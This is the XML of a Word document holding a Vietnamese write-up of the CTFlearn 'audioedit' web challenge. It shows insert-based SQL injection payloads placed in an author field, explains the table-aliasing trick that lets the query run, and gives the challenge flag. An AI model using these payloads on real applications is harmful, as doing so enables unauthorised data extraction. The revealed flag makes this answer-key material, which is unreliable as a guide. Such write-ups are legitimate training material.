    <w:p w14:paraId="58532DB6" w14:textId="77777777" w:rsidR="00B30B45" w:rsidRDefault="00B30B45" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75366232" w14:textId="42D4B5F1" w:rsidR="00B30B45" w:rsidRDefault="00B30B45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54BB29" wp14:editId="7844756A">
            <wp:extent cx="2362200" cy="149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74EA2354" w14:textId="555A4939" w:rsidR="00B30B45" w:rsidRDefault="00B30B45" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B7E55B" w14:textId="1AF03C2D" w:rsidR="00B30B45" w:rsidRDefault="0045200E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Tìm </w:t>
      </w:r>
      <w:r w:rsidR="00F84946">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kiếm cột title:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D415834" w14:textId="1EE16BCE" w:rsidR="00F84946" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F1780E" w14:textId="3ADEC4BA" w:rsidR="00F84946" w:rsidRPr="00D25421" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>author: ',(select title FROM audioedit limit 0,1))--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DD489" w14:textId="6C3F51C0" w:rsidR="00F84946" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5430259D" w14:textId="6DFDAA43" w:rsidR="00F84946" w:rsidRDefault="00F84946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Nhưng thông báo lỗi </w:t>
      </w:r>
      <w:r w:rsidRPr="00F84946">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04C"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779CCD8" w14:textId="56B441B9" w:rsidR="00F84946" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4A4C71" w14:textId="0C32F3AE" w:rsidR="00F84946" w:rsidRDefault="00F84946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Vấn đề ở đây là bạn không thể select từ 1 bảng mà bạn đang in</w:t>
      </w:r>
      <w:r w:rsidR="00D25421">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào trong bảng đó cùng 1 lúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D4CECB" w14:textId="7A0E0AF3" w:rsidR="00F84946" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C6F7E1" w14:textId="7F313233" w:rsidR="00F84946" w:rsidRPr="00D25421" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">author: ',(select title FROM audioedit as blue limit 0,1))--+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5FD10E" w14:textId="7FE3C9BE" w:rsidR="00F84946" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BF7F0C" w14:textId="161DC816" w:rsidR="00F84946" w:rsidRDefault="00F84946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flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F91BD5A" w14:textId="6519D280" w:rsidR="00F84946" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AAD6A2B" w14:textId="3B8629EC" w:rsidR="00F84946" w:rsidRPr="00D25421" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">author: ',(select file FROM audioedit as blue limit 0,1))--+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25030B6B" w14:textId="00D9C2B2" w:rsidR="00F84946" w:rsidRDefault="00F84946" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0ECA55" w14:textId="1A973E9B" w:rsidR="00F84946" w:rsidRDefault="003F6F5E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4C7BA4" wp14:editId="0E602C7C">
            <wp:extent cx="2891790" cy="1378119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49" cy="138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8233" w14:textId="3019A3CD" w:rsidR="003F6F5E" w:rsidRDefault="003F6F5E" w:rsidP="00A5459B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Tiếp theo bạn duyệt đến url đã khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F76AD35" w14:textId="46DF9B40" w:rsidR="003F6F5E" w:rsidRDefault="003F6F5E" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B53CDA8" w14:textId="62ADB6BA" w:rsidR="003F6F5E" w:rsidRPr="00D25421" w:rsidRDefault="003F6F5E" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://web.ctflearn.com/audioedit/edit.php?file=supersecretflagf1le.mp3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D47F3CF" w14:textId="0C6117CE" w:rsidR="003F6F5E" w:rsidRDefault="003F6F5E" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DAF7E1" w14:textId="4F7C5B21" w:rsidR="003F6F5E" w:rsidRDefault="00D25421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0E0A15" wp14:editId="4FE4D334">
            <wp:extent cx="5040630" cy="312616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86" cy="31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E53D" w14:textId="332756B6" w:rsidR="006221FE" w:rsidRDefault="006221FE" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07366035" w14:textId="310A7EE2" w:rsidR="006221FE" w:rsidRDefault="006221FE" w:rsidP="00A5459B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84DF78" wp14:editId="0DA5E9E4">
            <wp:extent cx="5055428" cy="3097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133" cy="31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80A2" w14:textId="36843485" w:rsidR="006221FE" w:rsidRDefault="006221FE" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08DF9229" w14:textId="25791A4D" w:rsidR="006221FE" w:rsidRPr="006221FE" w:rsidRDefault="006221FE" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006221FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: CTFlearn{m3t4_inj3cti00n}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277ECFA" w14:textId="2BDFC625" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D31D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B0E"/>
    <w:rsid w:val="000D09B9"/>
    <w:rsid w:val="00170615"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003D578A"/>
    <w:rsid w:val="003F6F5E"/>
    <w:rsid w:val="00434751"/>
    <w:rsid w:val="0045200E"/>
    <w:rsid w:val="0058003D"/>
    <w:rsid w:val="006221FE"/>
    <w:rsid w:val="00685D2D"/>
    <w:rsid w:val="006E1F84"/>
    <w:rsid w:val="007A6B0E"/>
    <w:rsid w:val="00926DEF"/>
    <w:rsid w:val="00A5459B"/>
    <w:rsid w:val="00B30B45"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00D25421"/>
    <w:rsid w:val="00D31D5F"/>
    <w:rsid w:val="00E455B4"/>
    <w:rsid w:val="00EC026E"/>
    <w:rsid w:val="00F8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6C7BED"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1763C58F-CA2B-A748-8BE3-5DE382FD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7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2023-08-16T10:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-29T11:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>